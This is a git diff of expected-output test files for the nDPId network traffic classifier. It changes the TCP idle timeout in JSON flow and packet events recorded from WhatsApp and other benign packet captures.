+00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 01130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582426553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582426553,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISk3sAAEARXw\/AqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MC
wgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","packets-captured":93,"packets-processed":93,"total-skipped-flows":0,"total-l4-data-len":24799,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":1432582431565} ~~~~~~~~~~~~~~~~~~~~ 
SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 93/93
diff --git a/test/results/whatsapp_voice_and_message.pcap.out b/test/results/whatsapp_voice_and_message.pcap.out
index 62311ad18..52978eb0c 100644
--- a/test/results/whatsapp_voice_and_message.pcap.out
+++ b/test/results/whatsapp_voice_and_message.pcap.out
@@ -1,10 +1,10 @@ 00477{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432820558921} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820558921,"flow_last_seen":1432820558921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820558921,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"} 
-00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820558921,"flow_last_seen":1432820558921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820558921,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820567259,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567259,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
@@ -45,30 +45,30 @@ 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820571716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFAABIABxAABAR+EMfDUkwCggAAQ2W0XQANGvUAQMAGCESpEIAAOlKSWdSWOu7U1cAIAAIAAGOsJ6wzx5AAgAIAAABTZrC3xA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432820571716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="} 